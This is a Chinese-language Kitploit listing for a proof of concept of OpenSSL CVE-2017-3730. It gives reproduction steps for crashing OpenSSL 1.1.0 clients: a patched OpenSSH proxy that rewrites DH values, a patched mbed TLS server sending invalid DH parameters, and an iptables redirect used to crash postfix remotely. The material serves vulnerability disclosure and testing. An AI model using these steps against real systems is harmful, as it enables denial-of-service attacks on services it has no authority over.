Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2017-3730 — OpenSSL CVE-2017-3730概念验证 | Kitploit
工具/GitHubGitHub/olivierh59500/cve-2017-3730
漏洞分析漏洞利用网络安全密码学渗透测试二进制利用
GitHubolivierh59500/cve-2017-3730

CVE-2017-3730

OpenSSL CVE-2017-3730概念验证

查看仓库
529年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2017-3730

OpenSSL CVE-2017-3730 概念验证

使用 OpenSSH 作为代理动态修补 DH 值

  • 创建一个使用类似 DHE-PSK-WITH-AES-256-GCM-SHA384 密码套件的 SSL 服务器。假设它运行在 10.0.2.2 端口 8899
  • 获取 openssh-7.4p1
  • 应用补丁
  • 编译它
  • 像这样运行:
root@kitploit:~
./ssh -vvv -N -D 1085 -o TCPKeepAlive=yes -o ServerAliveInterval=60 localhost
  • 在另一个终端中创建一个包含以下内容的文件 ~/.tsocks.conf:
root@kitploit:~
server = 127.0.0.1
server_port = 1085
server_type = 5
local = 127.0.0.0/255.255.255.0
  • ```export TSOCKS_CONF_FILE=`realpath ~/.tsocks.conf````
  • tsocks
  • 这将创建一个 shell,其中所有网络流量都流经我们的“邪恶”代理
  • openssl s_client -connect 10.0.2.2:8899 -psk AA
  • 崩溃

修改 mbed TLS 以提供无效的 DH 参数

  • 获取 https://github.com/ARMmbed/mbedtls/archive/mbedtls-2.4.1.tar.gz
  • 应用 mbedtls-2.4.1-patch.txt
  • make -j4 programs
  • 运行服务器:programs/ssl/ssl_server2 force_ciphersuite=TLS-DHE-RSA-WITH-AES-256-GCM-SHA384
  • 使用 OpenSSL 1.1.0 客户端连接它
  • 崩溃

远程崩溃 postfix

  • 使用 OpenSSL 1.1.0 编译 postfix
  • 针对已打补丁的 mbed TLS(见上文)编译 crash-postfix.c
  • 我采取的方法是在虚拟机中运行 postfix,然后在宿主机上运行 crash-postfix:
  • iptables -t nat -A OUTPUT -p tcp --dport 25 -j DNAT --to-destination 10.0.2.2:8888
  • 启动 crash-postfix
  • 运行 postfix:posttls-finger 10.0.2.2
  • 崩溃
下载工具